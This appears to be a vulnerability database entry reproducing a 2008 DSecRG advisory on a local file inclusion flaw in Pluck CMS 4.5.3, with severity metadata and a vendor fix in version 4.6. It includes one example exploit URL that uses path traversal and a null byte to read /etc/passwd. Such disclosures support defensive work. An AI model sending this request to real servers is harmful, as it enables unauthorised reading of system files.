vendor:
Pluck CMS
by:
Digital Security Research Group [DSecRG]
6.4
CVSS
MEDIUM
Local File Include
94
CWE
Product Name: Pluck CMS
Affected Version From: 4.5.2003
Affected Version To: 4.5.2003
Patch Exists: YES
Related CWE: N/A
CPE: a:pluck_cms:pluck_cms:4.5.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039
Pluck CMS has Local File Include vulnerability. Successful exploitation requires that "register_globals" is enabled. An example of the exploit is http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00
Mitigation:
Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here: http://www.pluck-cms.org/downloads/click.php?id=8